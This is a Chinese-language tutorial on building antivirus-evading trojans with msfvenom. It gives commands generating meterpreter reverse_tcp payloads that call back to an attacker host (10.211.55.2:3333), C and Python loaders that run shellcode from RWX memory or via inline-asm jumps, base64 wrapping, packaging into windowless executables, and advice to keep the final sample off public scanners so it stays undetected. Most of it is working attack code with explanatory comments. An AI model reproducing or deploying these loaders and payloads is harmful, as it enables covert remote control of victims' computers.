msfvenom——木马免杀篇
c语言执行
生成shellcode.c
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c > shellcode.c
然后打开生成的 shellcode.c,复制其中 unsigned char buf[] 数组的全部十六进制内容(形如 "\xfc\xe8..." 的字符串),直到结尾的分号为止。
c语言执行
复制到c语言中
//C语言执行shellcode的五种方法
#include <windows.h>
#include <stdio.h>
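/* MSVC-only linker directives; other toolchains ignore unknown pragmas. */
/* Make the .data section readable, writable AND executable so the shellcode
 * arrays below can be jumped into in place (methods 2-5 rely on this).
 * NOTE(review): an RWE data section switches DEP off for that section and is
 * an easy static indicator for AV/EDR; it is kept only because the tutorial's
 * in-place loaders need it. */
#pragma comment(linker, "/section:.data,RWE")
/* Build a GUI-subsystem binary (no console window) while keeping the console
 * CRT entry so plain main() is still used. The inner quotes must be
 * backslash-escaped inside the pragma string. */
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
/* No incremental linking; presumably so the addresses taken in the __asm
 * loaders are final and not incremental-link padding -- TODO confirm. */
#pragma comment(linker, "/INCREMENTAL:NO")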
//Demo payload said to launch the Windows calculator (calc.exe). It is not
//referenced by any of the RunShellCode_* functions below, which use `shellcode`.
//NOTE(review): the `\x` escape prefixes are missing from this listing -- as
//written each "xb8x82..." string is plain ASCII text, not machine code. Every
//`xNN` must read `\xNN` before this array holds the intended bytes.
unsigned char shellcode_calc[] =
"xb8x82x0ax8dx38xd9xc6xd9x74x24xf4x5ax29xc9xb1x23"
"x31x42x12x83xeaxfcx03xc0x04x6fxcdx38xf0x2bx2exc0"
"x01x3fx6bxfcx8ax43x71x84x8dx54xf2x3bx96x21x5axe3"
"xa7xdex2cx68x93xabxaex80xedx6bx29xf0x8axacx3ex0f"
"x52xe6xb2x0ex96x1cx38x2bx42xc7xc5x3ex8fx8cx99xe4"
"x4ex78x43x6fx5cx35x07x30x41xc8xfcx45x65x41x03xb2"
"x1fx09x20x40xe3x83xe8x2cx68xa3xd8x29xaex5cx15xba"
"x6fx91xaexccx73x04x3bx44x84xbdx35x1fx14xf1x46x1f"
"x15x79x2ex23x4ax4cx59x3bx22x27x5dx38x0ax4cxcex56"
"xf5x6bx0cxd5x61x14x2fx93x7cx73x2fx44xe3x1axa3xe9"
"xe4";
//Payload actually executed by RunShellCode_1..5 below.
//Reading the `68` (push imm32) instructions near the end, the bytes appear to
//build the strings "user32.dll", "MessageBox" and "Hello, from MSF!" before the
//final `ff d0` (call eax) -- i.e. this looks like the classic MessageBox demo
//payload, not a reverse shell. Treat that reading as an assumption to confirm.
//NOTE(review): as with shellcode_calc, the `\x` prefixes were lost in this
//listing; each `xNN` must be `\xNN` for the array to contain machine code.
unsigned char shellcode[] =
"xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9x64x8b"
"x71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7ex20x8b"
"x36x38x4fx18x75xf3x59x01xd1xffxe1x60x8bx6cx24"
"x24x8bx45x3cx8bx54x28x78x01xeax8bx4ax18x8bx5a"
"x20x01xebxe3x34x49x8bx34x8bx01xeex31xffx31xc0"
"xfcxacx84xc0x74x07xc1xcfx0dx01xc7xebxf4x3bx7c"
"x24x28x75xe1x8bx5ax24x01xebx66x8bx0cx4bx8bx5a"
"x1cx01xebx8bx04x8bx01xe8x89x44x24x1cx61xc3xb2"
"x08x29xd4x89xe5x89xc2x68x8ex4ex0execx52xe8x9f"
"xffxffxffx89x45x04xbbx7exd8xe2x73x87x1cx24x52"
"xe8x8exffxffxffx89x45x08x68x6cx6cx20x41x68x33"
"x32x2ex64x68x75x73x65x72x88x5cx24x0ax89xe6x56"
"xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87x1cx24x52"
"xe8x61xffxffxffx68x6fx78x58x20x68x61x67x65x42"
"x68x4dx65x73x73x31xdbx88x5cx24x0ax89xe3x68x58"
"x20x20x20x68x4dx53x46x21x68x72x6fx6dx20x68x6f"
"x2cx20x66x68x48x65x6cx6cx31xc9x88x4cx24x10x89"
"xe1x31xd2x52x53x51x52xffxd0x31xc0x50xffx55x08";
/* Function-pointer type RunShellCode_1 casts its RWX page to before calling
 * it: __stdcall, no return value, parameter list left unspecified. */
typedef void (__stdcall *CODE) ();
//Source of the five loader variants:
//http://rshell.blog.163.com/blog/static/41619170201110302937361/
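//Method 1: copy the shellcode into a freshly allocated RWX page and call it.
/* Allocates a committed PAGE_EXECUTE_READWRITE region of sizeof(shellcode),
 * copies `shellcode` into it and calls it through a CODE pointer.
 * Fixes vs. the original: on VirtualAlloc failure it showed a message box but
 * carried on and memcpy'd into NULL -- it now returns; and the check on
 * memcpy's return value is dropped because memcpy never returns NULL (it
 * returns its destination), so that branch could never fire.
 * NOTE(review): one RWX allocation immediately followed by a call into it is
 * the textbook pattern AV/EDR hook on; kept for fidelity with the tutorial. */
void RunShellCode_1()
{
	PVOID p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (p == NULL)
	{
		MessageBoxA(NULL, "申请内存失败", "提醒", MB_OK);
		return; /* nothing to copy into; do not dereference NULL */
	}
	memcpy(p, shellcode, sizeof(shellcode));
	CODE code = (CODE)p;
	code();
}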
//Method 2: call the .data array in place through a cast function pointer.
/* No copy is made: this only works because the "/section:.data,RWE" pragma
 * makes the section executable; without it the call faults under DEP. */
void RunShellCode_2()
{
	void (*entry)(void) = (void (*)(void))shellcode;
	entry();
}
//Method 3: MSVC 32-bit inline asm -- load the array's address with lea, then jump.
/* `jmp` (not `call`) pushes no return address, so control never comes back
 * through this function. Requires an x86 build (`eax`, `__asm`) and the RWE
 * .data pragma above, since the code is executed where it sits. */
void RunShellCode_3()
{
__asm
{
lea eax, shellcode;
jmp eax;
}
}
//Method 4: same as method 3 but the address is loaded as an immediate
//(`offset shellcode`) instead of computed with lea.
/* Same constraints: x86-only MSVC inline asm, executes in place (needs the
 * RWE .data section), and `jmp` means this function does not return. */
void RunShellCode_4()
{
__asm
{
mov eax, offset shellcode;
jmp eax;
}
}
//Method 5: as method 4, but the jump is emitted as raw opcode bytes.
/* `_emit 0xFF; _emit 0xE0` is the x86 encoding of `jmp eax`, so this is
 * behaviourally identical to RunShellCode_4; the raw bytes merely keep the
 * mnemonic out of the source. Same x86/MSVC/RWE constraints apply. */
void RunShellCode_5()
{
__asm
{
mov eax, offset shellcode;
_emit 0xFF;
_emit 0xE0;
}
}
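/* Entry point: runs exactly one of the five loaders above.
 * The original `void main()` is not a conforming C signature; `int main(void)`
 * returning 0 is what the CRT entry selected by the pragma expects anyway. */
int main(void)
{
	/* Enable one loader at a time. The __asm variants transfer control with
	 * jmp rather than call, so execution is not expected to come back here. */
	//RunShellCode_1();
	//RunShellCode_2();
	//RunShellCode_3();
	//RunShellCode_4();
	RunShellCode_5();
	return 0;
}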
eg:
#include "pch.h"
#include <iostream>
#include "stdio.h"
#include "Windows.h"
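// GUI subsystem (no console window) while keeping the console CRT entry so
// main() is used. The inner quotes must be backslash-escaped inside the pragma
// string; without the escapes the directive does not parse.
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")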
//Paste here the array body from the shellcode.c generated on the desktop in
//the msfvenom step above (the "\x.." string literals, up to and including the
//closing ';'). As listed, the initializer is intentionally left empty.
unsigned char shellcode[] =
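/* Minimal loader used in the example: allocate an RWX page, copy the msfvenom
 * shellcode into it and call it.
 * Changes vs. the original: `int main(void)` replaces the non-standard
 * `void main()`, and the VirtualAlloc result is checked -- the original copied
 * into it unconditionally, i.e. memcpy to NULL whenever allocation failed.
 * NOTE(review): RWX allocation + immediate call is the canonical AV/EDR
 * detection pattern; this is the reference loader, not an evasive one. */
int main(void)
{
	LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (Memory == NULL)
	{
		return 1; /* allocation failed; nothing to copy into */
	}
	memcpy(Memory, shellcode, sizeof(shellcode));
	((void(*)())Memory)();
	return 0;
}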
检查
查杀地址:http://r.virscan.org/language/zh-cn/report/dc322aacd4209d2a3366c9fb74a3442b (注意:提交到公开的多引擎在线查杀平台的样本通常会被共享给各杀软厂商,可能导致该样本很快被加入特征库;若要保持免杀效果,应避免上传最终使用的样本。)
python语言执行
方法一:python加载C代码
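"""Method 1: run raw shellcode in-process through ctypes (Windows only).

Reworked from the Python 2 original so it also runs unchanged on Python 3:

* the payload is a ``bytes`` literal with its ``\\x`` escapes restored (the
  listing had lost the backslashes, leaving an ASCII string);
* ``VirtualAlloc``/``CreateThread`` get pointer-sized ``restype``/``argtypes``;
  the original let ctypes default to a 32-bit ``int`` and re-wrapped the
  address in ``c_int``, which truncates pointers on a 64-bit interpreter --
  this is the underlying reason the page insists on a 32-bit Python;
* a NULL from ``VirtualAlloc`` or ``CreateThread`` raises instead of being
  passed on silently.
"""
import ctypes

# Truncated placeholder: only the first 13 bytes of the msfvenom stager.
# Replace with the full byte string from msfvenom's output before building.
SHELLCODE = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"

MEM_COMMIT_RESERVE = 0x3000  # MEM_COMMIT | MEM_RESERVE
PAGE_EXECUTE_READWRITE = 0x40  # RWX page: the usual AV/EDR trigger
INFINITE = 0xFFFFFFFF


def run_shellcode(shellcode):
    """Copy *shellcode* into a fresh RWX page, run it on a new thread, wait.

    Args:
        shellcode: raw machine code as ``bytes`` or ``bytearray``.

    Raises:
        ValueError: *shellcode* is empty (VirtualAlloc rejects a 0 size).
        ctypes.WinError: VirtualAlloc or CreateThread returned NULL.
        AttributeError: not on Windows (``ctypes.windll`` is absent).

    Blocks until the shellcode thread exits. Note that an RWX allocation
    immediately followed by CreateThread on it is the pattern most AV/EDR
    products flag first; it is kept because the tutorial is built on it.
    """
    if not shellcode:
        raise ValueError("empty shellcode")
    kernel32 = ctypes.windll.kernel32
    # Pointer-sized signatures so 64-bit addresses survive the round trip.
    kernel32.VirtualAlloc.restype = ctypes.c_void_p
    kernel32.VirtualAlloc.argtypes = [
        ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_uint32,
    ]
    kernel32.RtlMoveMemory.argtypes = [
        ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t,
    ]
    kernel32.CreateThread.restype = ctypes.c_void_p
    kernel32.CreateThread.argtypes = [
        ctypes.c_void_p, ctypes.c_size_t, ctypes.c_void_p,
        ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p,
    ]
    kernel32.WaitForSingleObject.argtypes = [ctypes.c_void_p, ctypes.c_uint32]

    size = len(shellcode)
    page = kernel32.VirtualAlloc(None, size, MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)
    if not page:
        raise ctypes.WinError()
    # Explicit size so create_string_buffer does not append a NUL byte.
    buf = ctypes.create_string_buffer(bytes(shellcode), size)
    kernel32.RtlMoveMemory(page, buf, size)
    thread_id = ctypes.c_uint32(0)
    handle = kernel32.CreateThread(None, 0, page, None, 0, ctypes.byref(thread_id))
    if not handle:
        raise ctypes.WinError()
    kernel32.WaitForSingleObject(handle, INFINITE)


if __name__ == "__main__":
    run_shellcode(SHELLCODE)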
然后要使用PyInstaller将py转为exe,pyinstaller依赖于pywin32,在使用pyinstaller之前,应先安装pywin32。
pywin32下载后,点击下一步安装即可
https://sourceforge.net/projects/pywin32/files/pywin32
pyinstaller 下载:https://github.com/pyinstaller/pyinstaller/releases
解压后安装好依赖包(pip install -r requirements.txt)即可使用。将 pyshellcode.py 复制到 C:\Python27_x86\pyinstaller 目录中,在该目录下执行以下命令编译exe(-F 打包为单个文件,-w 运行时不显示控制台窗口):
python pyinstaller.py -F -w pyshellcode.py
方法2:py2exe打包编译exe
该方法借用了免杀工具 Python-Rootkit 的思路。
首先要在windows上安装x86版的python。
注意:必须使用x86版本Python 2.7,即使Windows是x64的,也要安装32位版本。
我这里安装的是Python 2.7.16 x86 windows版:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
之后安装32位Py2exe for python 2.7,https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download
在Windows上安装OpenSSL(可选)
msfvenom生成python payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f raw -o shell.py
创建文件setup.py
"""py2exe build script: bundle shell.py (the msfvenom python stager) into a
single console executable (bundle_files=1, no separate library zip)."""
from distutils.core import setup
import py2exe  # noqa: F401  -- importing it makes the "py2exe" command available

# Options handed to the py2exe command; the comma-separated module lists are
# the form py2exe accepts for "packages"/"includes".
PY2EXE_OPTIONS = {
    "bundle_files": 1,
    "packages": "ctypes",
    "includes": "base64,sys,socket,struct,time,code,platform,getpass,shutil",
}

setup(
    name="Meter",
    description="Python-based App",
    version="1.0",
    console=["shell.py"],
    options={"py2exe": PY2EXE_OPTIONS},
    zipfile=None,
)
在msf监听端将payload设置为 python/meterpreter/reverse_tcp(必须与上面msfvenom生成shell.py时使用的payload一致;若设成windows/meterpreter/reverse_tcp,python stager收到的stage将无法执行),监听相应的3333端口。
在windows下执行 python.exe .\setup.py py2exe,生成的exe文件大小约11M。
方法3:base64编码
和方法一一样,先用msfvenom生成shellcode,但这次要加上 --encrypt base64,让输出的shellcode为base64编码:
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=10.211.55.2 LPORT=3333 -f c
python代码如下:
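"""Method 3: base64-wrapped shellcode loader (Windows only).

The msfvenom output produced with ``--encrypt base64`` is pasted into
ENCODED_SHELLCODE, decoded at run time and executed from an RWX page.

Compared with the original listing: decoding lives in a testable helper;
``VirtualAlloc``/``CreateThread`` get pointer-sized ctypes signatures (the
original let VirtualAlloc's result default to a 32-bit ``int``, which
truncates addresses on a 64-bit interpreter); and an empty payload -- which
is what the listing ships -- is rejected up front instead of VirtualAlloc
failing on size 0 and RtlMoveMemory then being handed a NULL destination.
"""
import base64
import ctypes

# Paste the base64 text from msfvenom here; it is intentionally empty here.
ENCODED_SHELLCODE = ""

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40  # RWX page: the usual AV/EDR trigger
INFINITE = 0xFFFFFFFF


def decode_shellcode(encoded):
    """Return the raw payload bytes for a base64 *encoded* string ("" -> b"").

    Raises:
        binascii.Error: *encoded* is not valid base64.
    """
    return base64.b64decode(encoded)


def run_shellcode(shellcode):
    """Copy *shellcode* into a fresh RWX page, run it on a new thread, wait.

    Args:
        shellcode: raw machine code as ``bytes``.

    Raises:
        ValueError: *shellcode* is empty.
        ctypes.WinError: VirtualAlloc or CreateThread returned NULL.
        AttributeError: not on Windows (``ctypes.windll`` is absent).

    Note that RWX allocation followed directly by CreateThread is the pattern
    most AV/EDR products flag first; it is kept because the tutorial uses it.
    """
    if not shellcode:
        raise ValueError("empty shellcode")
    kernel32 = ctypes.windll.kernel32
    # Pointer-sized signatures so 64-bit addresses are not truncated.
    kernel32.VirtualAlloc.restype = ctypes.c_void_p
    kernel32.VirtualAlloc.argtypes = [
        ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_uint32,
    ]
    kernel32.RtlMoveMemory.argtypes = [
        ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t,
    ]
    kernel32.CreateThread.restype = ctypes.c_void_p
    kernel32.CreateThread.argtypes = [
        ctypes.c_void_p, ctypes.c_size_t, ctypes.c_void_p,
        ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p,
    ]
    kernel32.WaitForSingleObject.argtypes = [ctypes.c_void_p, ctypes.c_uint32]

    size = len(shellcode)
    rwxpage = kernel32.VirtualAlloc(None, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    if not rwxpage:
        raise ctypes.WinError()
    # Explicit size so create_string_buffer does not append a NUL byte.
    buf = ctypes.create_string_buffer(shellcode, size)
    kernel32.RtlMoveMemory(rwxpage, buf, size)
    handle = kernel32.CreateThread(None, 0, rwxpage, None, 0, None)
    if not handle:
        raise ctypes.WinError()
    kernel32.WaitForSingleObject(handle, INFINITE)


if __name__ == "__main__":
    run_shellcode(decode_shellcode(ENCODED_SHELLCODE))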
使用pyinstaller编译打包exe
python pyinstaller.py -F -w pyshellcode.py